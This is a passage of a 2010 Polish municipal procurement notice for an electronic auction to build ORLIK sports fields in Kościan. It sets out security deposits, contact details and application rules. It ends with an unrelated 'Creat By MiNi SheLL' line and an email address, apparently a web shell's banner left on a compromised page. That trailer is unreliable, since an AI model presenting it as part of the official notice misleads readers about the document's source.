<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Termin otwarcia licytacji 5 dni od dnia przekazania wykonawcom zaproszenia do składania ofert  o godz. 10.00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta jeżeli w ciągu 15 minut od złożenia najkorzystniejszego postąpienia, żaden z wykonawców nie złożył korzystniejszego postąpienia</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1.	Zamawiający wymaga zabezpieczenia należytego wykonania umowy, które służyć będzie pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy oraz roszczeń z tytułu rękojmi za wady.
2.	Od Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny ofertowej przedstawionej przez Wykonawcę.
3.	Dopuszcza się wnoszenie zabezpieczenia w jednej lub kilku następujących formach:
1)	pieniądzu  na - numer konta zamawiającego: Bank Spółdzielczy w Kościanie 73 8666 0004 0103 7426 2000 0005,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy zawsze zobowiązaniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z 2007 Nr 42, poz. 275).
W przypadku wniesienia należytego wykonania umowy w formie gwarancji lub poręczeń winny być wystawione na okres  obejmujący wykonanie zamówienia.
4.	Zwrot zabezpieczenia należytego wykonania umowy został określony we wzorze umowy.</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Projekt umowy znajduję sie na stronie internetowej zamawiającego http:bip.wokiss.pl/koscianm w menu zamówienia publiczne Urząd Miejski ogłoszenie o zamówieniu załącznik nr 10</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> OPIS SPOSOBU POROZUMIEWANIA SIĘ Z WYKONAWCAMI 1.	Wszelkiego rodzaju zawiadomienia, informacje itp. Wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną .
2.	Forma telefaksu i elektroniczna na żądanie każdej ze stron wymaga niezwłocznie potwierdzenia faktu otrzymania dokumentu.
3.	W przypadku braku potwierdzenia otrzymania wiadomości przez wykonawcę domniemuje się, iż pismo wysłane przez zamawiającego na podany przez wykonawcę numer faksu, e-maila  zostało mu doręczone w sposób umożliwiający zapoznanie się wykonawcy z tym pismem.
4.	Od momentu otwarcia do momentu zamknięcia licytacji Zamawiający i Wykonawcy wszelkiego rodzaju wnioski, oświadczenia i inne informacje przekazują drogą elektroniczną za pośrednictwem platformy licytacyjnej, wiadomości przekazane wykonawcom będą widoczne w zakładce moje wiadomości.
5.	Osoby uprawnione do porozumiewania się z wykonawcami: Regina Mielcarek - Kierownik Biura Zamówień Publicznych
-numer telefonu  65 511 43 45 
-numerem faksu   65  512 27 00
-e-mail: bzp@koscian.pl
6.	Wniosek o dopuszczenie udziału w licytacji, a także wszystkie składane oświadczenia i dokumenty muszą być podpisane przez osobę lub osoby uprawnione do reprezentowania Wykonawcy zgodnie z reprezentacją wynikającą z właściwego rejestru i wymaganiami ustawowymi. Jeżeli osoba/osoby podpisujące wniosek oraz oświadczenia i dokumenty działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi zostać dołączone do wniosku o udział w licytacji  w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
7.	Podpisy na wniosku, oświadczeniach i dokumentach powinny być czytelne albo opatrzone imienną pieczątką.
8.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo pełnomocnika do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. SKŁADANIE WNIOSKÓW	1.Wniosek o dopuszczenie do udziału w licytacji należy umieścić w zamkniętym opakowaniu, uniemożliwiającym odczytanie  zawartości bez uszkodzenia tego pakowania. Opakowanie winno być oznaczone nazwą (firmą) i adresem Wykonawcy, zaadresowane na adres Urząd Miejski Kościana, Al. Kościuszki 22, 64-000 Kościan oraz opisane -Wniosek o dopuszczenie do udziału w licytacji elektronicznej na wykonanie boisk sportowych - Moje boisko - ORLIK 203  w Kościanie. Nie otwierać przed dniem 08.06.2010 r. godz. 9:00. 2.	Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wykonawców spełniających warunki udziału w postępowaniu. Zaproszenie zostanie przekazane wykonawcom na podany we wniosku o dopuszczenie do udziału w postępowaniu adres e-mail lub fax.
ZAŁĄCZNIKI:

1.	Specyfikacja techniczna wykonania i odbioru robót budowlanych
2.	Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót budowlanych
3.	Dokumentacja projektowa.
4.	Przedmiar robót.
5.	Wniosek o dopuszczenie do udziału w postępowaniu.
6.	Oświadczenie o braku podstaw do wykluczenia.
7.	Oświadczenie z art. 22 ust. 1  ustawy. 
8.	Doświadczenie zawodowe.
9.	Oświadczenie  Wykonawcy - uprawnienia.
10.	Projekt umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com